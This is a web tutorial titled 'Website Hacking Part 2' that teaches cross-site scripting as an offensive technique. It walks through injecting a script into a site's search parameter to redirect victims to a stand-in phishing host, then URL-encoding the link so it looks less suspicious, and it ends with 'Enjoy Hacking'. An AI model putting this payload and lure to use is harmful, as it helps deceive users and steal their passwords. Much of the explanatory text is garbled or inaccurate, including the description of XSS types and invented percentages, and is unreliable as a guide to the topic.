Cross Site Scripting ( XSS ) Web Application Penetration Tutorial - Website Hacking Part 2

Cross site scripting (XSS) used when a someones inputs malicious data into a website, which causes the program to do something it wasn’t intended to do. XSS attacks are very nowadays very popular and some of the largest websites have been affected by them including the FB, CNN, Paypal, Payza, Microsft, and Yahoo. Some sites features usually vulnerable to XSS attacks are:

• Search Engines
• Login Forms
• Comment Fields

Three Types of XSS attacks:

1).  Local XSS attacks are the most rearrest and dangerous malicious. This attack requires an exploit for any browser vulnerability. With this type of attack, the hacker can install backdoors, Trojans and worms onto your computer.

2).  Non-persistent attacks are usually used by hackers which are mostly harmless for the targeted website. Non-persistent attacks occur when ( scripting language that is used for client web develpoment) or HTML is inserted into a sufficient which causes users outputs to hackers file. These attacks are only activated when the user visits the malicious link.

3). Persistent attacks are mostly and 90% used against web applications/programs like PDF books, forums, and ads boxes and on online games. From this attack a hacker can do:

• Steal website cookies
• Stealers
• Creation of Worms

How Hackers Create Cross Site Scripting

 Hackers knowledgeable in Scripting/coding and PHP will be able to handle advanced XSS attacks to steal your cookies and spread worms to any targeted website, but to show you a simple and quick example of something more realistic then above, I have mentoned how hackers use cross site scripting XSS.
1). If a hacker wants to phish passwords from www.victim.com. If he was able to find an XSS vulnerability  he would be able to create a link pointing to the victims website that redirects to his phishing host.

2). when I inserted the script into the search box, a URL was formed that looked like the following:

3). In the link the hacker would then change everything in between these :-  ?searchbox= and &search with the following JavaScript code:

<script>window.location = “http://phishing-site.com”</script>

4). Now when you go to the finished url, the targeted site will redirect to the phishing website. Next He would encode the link to make it look more secure and less suspicious. You can encode the URL at http://www.encodeurl.com/.

5). My finished encoded URL is:

http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21

6). Once the victim opnes that link points to the targeted website, he will be more likely to fall on the phishing page.

Enjoy Hacking....